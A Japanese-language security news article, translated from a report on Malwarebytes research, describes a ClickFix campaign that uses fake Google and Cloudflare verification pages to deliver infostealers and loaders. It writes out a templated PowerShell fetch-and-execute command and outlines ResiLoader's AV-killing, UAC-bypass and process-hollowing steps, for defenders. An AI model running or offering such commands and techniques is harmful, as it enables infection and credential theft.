Google やCloudflareの偽認証ページを悪用し、ユーザーを騙して自らの端末を感染させる大規模なClickFixキャンペーンが確認されました。
Malwarebytesが報告したこの攻撃活動では、HijackLoader、StealC、Remus、Amatera Stealer、CastleLoader、NetSupport、そしてRustベースのスティーラーなど、多岐にわたるペイロードが配布されており、いずれも2025年後半から稼働している共通のインフラに紐づいています。
ClickFix攻撃はエクスプロイトに依存しません。その代わりに、被害者を「人間であることの確認」などと称して騙し、悪意あるPowerShellコマンドを自ら手動でコピー&実行させるという、ソーシャルエンジニアリングの手法を使います。
このキャンペーンでは、偽のreCAPTCHAプロンプト、Cloudflareの「あなたが人間であることを確認」画面を偽装したページ、Google Meetの音声修正通知を装った偽の通知、さらには偽のQRコード生成ツールまでもが使われており、いずれも被害者を同一の核となる罠へと誘導する仕組みになっています。
「New sign-in with trusted token」というテンプレートを使うキットの中には、攻撃者が被害者ごとに実行させるコマンドを手動で選択できる「承認ゲート」機能まで備えたものもあり、キャンペーンの一部を人間のオペレーターが実際に監視・操作している可能性がうかがえます。
偽装の手口は多様ですが、背後にあるインフラには一貫した痕跡が見られます。ペイロードは通常C:\ProgramData\Zoomsフォルダに展開され、被害者が実行させられるPowerShellコマンドは、powershell−c”iex(irm′{IP}:{Port}/{Path}′−UseBasicParsing)”のようなパターンに沿っていることが確認できます。
ペイロード配布はCloudflare R2ストレージバケットを経由することが多く、そのホスティングインフラはDedik Services LimitedのASNに紐づいています。さらに、複数のケースにおいて、悪意あるサーバーは想定外のリクエストに対して「hehe」という文字列のみを含むページを返す挙動が確認されています。
攻撃者がポートやパス、配布方法を絶えず変更しているため、これらの痕跡がすべての感染チェーンに存在するわけではありません。しかし、これらを総合すると、複数の誘導手口を並行して展開する一つの協調されたキャンペーンであることが浮かび上がってきます。
特に注目すべき感染チェーンの一つは、正規のメッセージングアプリ「Franz」のトロイの木馬化されたバージョンから始まります。
このバックドア化されたアプリのindex.jsは、ローカルのreadme.txtファイルからキャンペーンキーを読み取り、C2(コマンド&コントロール)サーバーにチェックインしたうえで、任意のJavaScriptを実行したり、正規のssh-add.exeバイナリを乗っ取るために使われる一連のDLLを含む追加ファイルをドロップ・実行したりすることができます。
Malwarebytesによると、このDLLハイジャッキングは最終的に、研究者らがResiLoaderと名付けた、これまで報告されていなかったローダー(難読化されたNET NativeAOTバイナリ)を読み込むとのことです。
ResiLoaderはOPSWAT AppRemoverドライバーであるpcdhost.sysをドロップし、それを使ってアンチウイルスやEDRツールに関連する140以上のプロセスを終了させたうえで、昇格されたCOMインターフェースICMLuaUtilを介したUACバイパスを試みます。
その後、「Google Update」を装ったRunレジストリキーを通じて永続化を確立し、最後にServiceModelReg.exeに対してプロセスホロウイングを行い、StealCインフォスティーラーをメモリ上で起動して締めくくります。
ポートやIPアドレス、誘導用テンプレートを次々と変化させるこのキャンペーンのインフラの流動性ゆえに、静的な指標のみに基づく検知は単独では信頼性を欠きます。だからこそ、ブロックリストと同じくらい振る舞いベースの防御が重要になるのです。
GoogleやCloudflareといった信頼されたブランド名への依存と、カウントダウンタイマーや不正サインインを装った偽の警告といった緊迫感を煽る手口を組み合わせることで、このキャンペーンはソフトウェアの脆弱性ではなくユーザーの心理を突いています。これは、ここ2年間でClickFixがより広範に進化してきた流れとも一致するパターンです。
最も効果的な防御策は、依然としてシンプルです。「人間であることを確認する」と称するWebページからコマンドを貼り付けたり実行したりしないこと。正規のGoogle、Cloudflare、Microsoftのいずれのサービスも、こうした操作を要求することは決してありません。
PowerShell、コマンドプロンプト、ターミナルを開くよう求める不審な指示は、すべて警戒すべき兆候として扱い、公式のサポート窓口を通じて確認するようにしてください。また、悪意あるドメインがコマンドをコピーされる前にブロックされるよう、Webフィルタリング機能を備えたエンドポイント保護を有効にしておくことも重要です。
注: IPアドレスおよびドメインは、誤った名前解決やハイパーリンク化を防ぐため、意図的に無効化表記(例: [.])にしてあります。再度有効な形式に戻す場合は、MISP、VirusTotal、あるいは自組織のSIEMなど、管理された脅威インテリジェンス基盤の中でのみ行ってください。
翻訳元: https://cyberpress.org/fake-google-cloudflare-verification-pages/